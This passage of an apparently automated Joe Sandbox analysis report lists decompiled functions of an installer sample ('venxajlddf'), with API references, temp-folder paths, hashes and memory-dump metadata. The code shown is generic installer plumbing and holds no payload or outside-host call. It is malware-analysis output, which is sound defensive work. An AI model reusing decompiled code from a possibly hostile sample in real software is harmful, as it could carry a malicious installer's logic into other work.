					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655b
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230), ref: 0040657C
RegCloseKey.ADVAPI32(?), ref: 00406587

Strings

('B, xrefs: 0040655B
Call, xrefs: 0040653D

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseQueryValue
String ID: ('B$Call
API String ID: 3356406503-2122505255
Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000), ref: 00405F47
lstrcatW.KERNEL32 ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 73BF10E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E73BF10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x73bf506c = _a8;
				 *0x73bf5070 = _a16;
				 *0x73bf5074 = _a12;
				_a12( *0x73bf5048, E73BF1651, _t73);
				_t66 =  *0x73bf506c +  *0x73bf506c * 4 << 3;
				_t27 = E73BF12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x73bf5040;
							if( *0x73bf5040 == 0) {
								goto L26;
							}
							E73BF1603( *0x73bf5074, _t31 + 4, _t66);
							_t34 =  *0x73bf5040;
							_t86 = _t86 + 0xc;
							 *0x73bf5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73BF1312(E73BF135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73BF1381(_t80, E73BF12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E73BF1603(_t10,  *0x73bf5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x73bf5040;
							 *0x73bf5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x73bf5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E73BF1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x73bf506c +  *0x73bf506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E73BF1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x73bf5070);
						 *( *0x73bf5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x73bf10eb
0x73bf1100
0x73bf1109
0x73bf110e
0x73bf1119
0x73bf111c
0x73bf1125
0x73bf1129
0x73bf112b
0x73bf12b0
0x73bf12ba
0x73bf12ba
0x73bf1132
0x73bf1132
0x73bf1137
0x73bf1138
0x73bf113a
0x73bf113d
0x73bf1256
0x73bf1259
0x73bf1271
0x73bf1271
0x73bf1278
0x00000000
0x00000000
0x73bf1285
0x73bf128a
0x73bf128f
0x73bf1294
0x73bf129a
0x73bf129b
0x00000000
0x73bf129b
0x73bf125b
0x73bf125e
0x73bf11bc
0x73bf11bf
0x73bf11c2
0x73bf11cb
0x73bf11d0
0x00000000
0x73bf11d1
0x73bf1264
0x73bf1266
0x73bf11a2
0x73bf11a5
0x73bf11a8
0x73bf11b1
0x00000000
0x73bf11b1
0x73bf1164
0x73bf1165
0x73bf1177
0x73bf1180
0x73bf1184
0x73bf118e
0x73bf1191
0x73bf1193
0x73bf1193
0x00000000
0x73bf1165
0x73bf1143
0x73bf1218
0x73bf121d
0x73bf1221
0x73bf1223
0x73bf122c
0x73bf122f
0x73bf1238
0x73bf123d
0x73bf123d
0x73bf1247
0x73bf124a
0x00000000
0x73bf1250
0x73bf1149
0x73bf114c
0x73bf11e9
0x73bf11ed
0x73bf11f7
0x73bf11fb
0x73bf1205
0x73bf120a
0x73bf1211
0x00000000
0x73bf1211
0x73bf1152
0x73bf1155
0x00000000
0x00000000
0x73bf115b
0x73bf115e
0x73bf11b8
0x00000000
0x73bf11b8
0x73bf1160
0x73bf1162
0x73bf119e
0x00000000
0x73bf119e
0x00000000
0x73bf12a1
0x73bf12a1
0x73bf12ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73BF1171
GlobalAlloc.KERNEL32(00000040,?), ref: 73BF11E3
GlobalFree.KERNEL32 ref: 73BF124A
GlobalFree.KERNEL32(?), ref: 73BF129B
GlobalFree.KERNEL32(00000000), ref: 73BF12B1

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8a3b098e90e7ca1897fed939c4c7c3466c1e5d4066010be566c76886e25a1e05
Instruction ID: 26f26dccca281ef7c7c381ac662e11c76cb3c056eb058575357f72ecf841af82
Opcode Fuzzy Hash: 8a3b098e90e7ca1897fed939c4c7c3466c1e5d4066010be566c76886e25a1e05
Instruction Fuzzy Hash: 725192B6900203DFE710EFB9C984B157BB8FB84315B14692AF909DB650E730EA08CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t14;
				intOrPtr _t22;
				intOrPtr _t25;
				void* _t30;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce58; // 0x643440
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t34 = GlobalAlloc(0x40, 0x804);
						_t5 = _t34 + 4; // 0x4
						E004066A5(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce58; // 0x643440
						 *_t34 = _t12;
						 *0x40ce58 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x643444
							E00406668(_t30, _t3);
							_push(_t33);
							 *0x40ce58 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E00406668(_t32, _t33 + 4);
								_t22 =  *0x40ce58; // 0x643440
								E00406668(_t36, _t22 + 4);
								_t25 =  *0x40ce58; // 0x643440
								_push(_t32);
								_push(_t25 + 4);
								E00406668();
								L15:
								 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004066A5(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405CC8();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(00643440), ref: 00401C0B
GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C1D

Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2
@4d, xrefs: 00401B9E, 00401BCE, 00401BDD, 00401C06, 00401C31, 00401C38

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: @4d$Call
API String ID: 3292104215-4199483217
Opcode ID: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
Instruction ID: d74cddccbdd50a14e5bf5e3e63826a63b2a65df0fd836753f00777670cd3b466
Opcode Fuzzy Hash: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
Instruction Fuzzy Hash: 5321D872904210DBDB20EFA4DEC4E5E73A4AB047157150A3BF542F72D0D6BD9C518BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp", "C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp$C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll
API String ID: 1659193697-3194497338
Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x194
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x18c
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\nsoF8F7.tmp", 7);
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c66

APIs

CloseHandle.KERNEL32(00000194), ref: 00403C37
CloseHandle.KERNEL32(0000018C), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp, xrefs: 00403C5B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp
API String ID: 2962429428-143264073
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
